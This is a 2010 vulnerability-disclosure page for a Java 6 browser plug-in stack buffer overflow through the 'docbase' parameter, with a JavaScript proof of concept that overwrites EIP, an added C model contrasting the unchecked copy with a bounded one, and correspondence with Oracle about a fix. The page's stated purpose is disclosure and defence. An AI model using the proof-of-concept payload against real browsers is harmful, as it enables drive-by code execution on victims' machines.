
skylined - issue #23

Oracle 18381831 - Java OBJECT tag "launchjnlp"/"docbase" property stack buffer overflow


Posted on Aug 31, 2010 by Massive Rabbit

A simple stack buffer overflow exists in Sun Java 6 Update 21 (build 1.6.0_21-b07), which is the latest available version to date. When a value for "launchjnlp" is provided through a "param" tag, the value of "docbase", also provided through a "param" tag, gets copied into a fixed-size stack buffer without checking whether the buffer is large enough to hold it. This allows an unlimited amount of data to be overwritten on the stack, including the saved return address, which gets loaded into EIP when the function returns. This vulnerability allows code execution when a victim visits a malicious website.

Repro (crashes with EIP=0xDEADBEEF):

    <script>
      // 0x188 bytes of padding, then the value that ends up in EIP (little-endian)
      var sBoF = str(0x188, 'A') + dword(0xDEADBEEF);
      var asHtml = [
    //  '<object classid="clsid:{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBB}">',
    //  '<object classid="clsid:{CAFEEFAC-0014-0002-0000-ABCDEFFEDCBA}">',
        '<object type="application/x-java-applet">',
        '<param name="launchjnlp" value="1"/>',
        '<param name="docbase" value="' + sBoF + '"/>',
        'FAIL!',
        '</object>'
      ];
      document.write(asHtml.join(''));

      // Repeat sString iCount times.
      function str(iCount, sString) {
        return new Array(iCount + 1).join(sString);
      }
      // Encode a 32-bit value as four little-endian characters.
      function dword(iValue) {
        for (var sString = ''; sString.length < 4;)
          sString += String.fromCharCode(iValue & 0xFF), iValue >>>= 8;
        return sString;
      }
    </script>
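A model of the overflow described above, added here as an illustration; it is neither Oracle's plug-in code nor any of the attachments on this bug. The repro pads "docbase" with 0x188 bytes and then supplies the four bytes that land in EIP, so the model assumes the saved return address sits 0x188 bytes past the start of the local buffer; the struct layout, the placeholder return address ORIGINAL_RET and the function names are assumptions, while 0x188 and 0xDEADBEEF come from the repro. The unchecked copy is run against the modelled frame rather than the real stack so the demonstration can show the overwritten return slot without crashing, and the hardened form shows the bounds check the plug-in lacked.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumptions for the model: 0x188 is the repro's padding length; whether that
   span also covers a saved frame pointer or other locals is unknown, so the
   model folds everything below the return slot into one region. */
#define RET_OFFSET    0x188        /* from the repro */
#define ORIGINAL_RET  0x00401000u  /* placeholder legitimate return address (assumption) */

struct frame {
    char     docbase[RET_OFFSET];  /* fixed-size local buffer plus whatever lies above it */
    uint32_t saved_ret;            /* return address popped into EIP on return (32-bit x86) */
    char     caller[64];           /* start of the caller's frame; room for the overflow's NUL */
};

/* Mirror of the repro's dword(): little-endian, which is both how the x86 stack
   stores a pointer and how the JavaScript string delivers it. */
static void put_dword_le(char *dst, uint32_t v)
{
    for (int i = 0; i < 4; i++) {
        dst[i] = (char)(v & 0xFF);
        v >>= 8;
    }
}

/* Build the repro's "docbase" value: RET_OFFSET bytes of 'A', then the target EIP. */
size_t build_payload(char *out, size_t cap, uint32_t eip)
{
    if (cap < RET_OFFSET + 4 + 1)
        return 0;
    memset(out, 'A', RET_OFFSET);
    put_dword_le(out + RET_OFFSET, eip);
    out[RET_OFFSET + 4] = '\0';
    return RET_OFFSET + 4;
}

/* The bug class: the param value is copied into the local buffer without being
   checked against sizeof docbase.  In the plug-in the copy runs off the end of
   the real stack; here it runs off docbase[] into saved_ret.  The only bound is
   the model's own size, so that this demo cannot corrupt its own process.
   Returns the return slot as it would be popped into EIP. */
uint32_t vulnerable_copy(struct frame *f, const char *docbase)
{
    f->saved_ret = ORIGINAL_RET;
    size_t n = strlen(docbase) + 1;
    if (n > sizeof *f)
        n = sizeof *f;
    memcpy((char *)f, docbase, n);   /* docbase is the first member, offset 0 */
    return f->saved_ret;
}

/* Hardened form: reject any value that does not fit, NUL included, before
   copying anything.  Returns 0 on success, -1 when the value is rejected. */
int hardened_copy(struct frame *f, const char *docbase)
{
    f->saved_ret = ORIGINAL_RET;
    size_t len = strlen(docbase);
    if (len >= sizeof f->docbase)
        return -1;
    memcpy(f->docbase, docbase, len + 1);
    return 0;
}

int main(void)
{
    struct frame f;
    char payload[RET_OFFSET + 5];
    int rc;

    build_payload(payload, sizeof payload, 0xDEADBEEF);
    printf("unchecked copy: return slot = 0x%08X\n", vulnerable_copy(&f, payload));
    rc = hardened_copy(&f, payload);
    printf("bounded copy:   rc = %d, return slot = 0x%08X\n", rc, f.saved_ret);
    rc = hardened_copy(&f, "http://www.example.com/applet/");
    printf("bounded copy of a sane value: rc = %d\n", rc);
    return 0;
}
```

The first line of output shows 0xDEADBEEF in the return slot, which is exactly the EIP value the repro reports; the bounded copy leaves ORIGINAL_RET in place and rejects the oversized value, while a normal docbase URL still fits.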

Attachments

Comment #1

Posted on Aug 31, 2010 by Massive Rabbit

(No comment was entered for this change.)

Comment #2

Posted on Aug 31, 2010 by Massive Rabbit

Message to Oracle: Hey,

<>

I'm hoping the above is sufficient for you to start your investigation. If I find some time, I plan to write a working exploit that shows code execution is indeed possible, even with ASLR+DEP enabled. Please let me know if you need any more information.

Can you please let me know if you can reproduce the issue before the end of this week and, once you have completed your investigation, when you plan to release a fix for this issue.

I will be tracking this bug at http://code.google.com/p/skylined/issues/detail?id=23. If you would like access to the information stored there and have a Google code account, let me know and I will add you to the bug.

Cheers, SkyLined

Comment #3

Posted on Aug 31, 2010 by Massive Rabbit

Attached is a simple exploit that works when ASLR+DEP is not enabled. Tested with:

  • Windows XP sp3 en-us [5.1.2600]
  • MSIE 6.0.2900.5512.xpsp_sp3_gdr.100427-1636
  • MSIE 7.0.5730.13
  • Java 6 Update 20 (build 1.6.0_20-b02)
  • Java 6 Update 21 (build 1.6.0_21-b07)

This exploit does not work on the following platforms/browsers because of ASLR/DEP:

  • Windows Vista
  • Windows 7
  • MSIE 8

Attachments

Comment #4

Posted on Sep 1, 2010 by Massive Rabbit

Message from Oracle: Hi Berend,

Thank you for bringing this issue to our attention. We are investigating and will get back to you once we complete our investigation. As always, if we confirm this to be a vulnerability, we would like to coordinate announcements with you.

Our tracking number for this issue is 18381831.

Cheers,

Chok
Oracle Security Alerts

Comment #5

Posted on Sep 2, 2010 by Massive Rabbit

Hi Berend,

We have verified that this is a duplicate of an issue that we have addressed in our upcoming Java security update. We will inform you before we release the update so we can coordinate announcements with you.

Cheers,

Chok
Oracle Security Alerts

Comment #6

Posted on Sep 2, 2010 by Massive Rabbit

(No comment was entered for this change.)

Comment #7

Posted on Sep 2, 2010 by Massive Rabbit

(No comment was entered for this change.)

Comment #8

Posted on Sep 3, 2010 by Massive Rabbit

(No comment was entered for this change.)

Comment #9

Posted on Oct 12, 2010 by Massive Rabbit

Comment deleted

Attachments

Comment #10

Posted on Oct 12, 2010 by Massive Rabbit

Comment deleted

Attachments

Comment #11

Posted on Oct 12, 2010 by Massive Rabbit

Attached are two versions of Internet Exploiter 12, called iExploit12 for no apparent reason:

  • a minimal version that does not try to bypass mitigations such as DEP but which is only 512 bytes in size,
  • a more complex version, which uses information about modules loaded in MSIE to create a ret-into-libc attack to bypass DEP.

An even more complex version, which uses issue 24 to try to bypass ASLR as well, will not be made available until both this bug and issue 24 are published.

Attachments

Comment #12

Posted on Oct 13, 2010 by Massive Rabbit

(No comment was entered for this change.)

Comment #13

Posted on Oct 13, 2010 by Massive Rabbit

(No comment was entered for this change.)

Status: Fix-Verified

Labels:
Published Cause-BoundsCheckMissing Severity-Critical Risk-UserCodeExecution Mitigation-JavaNeeded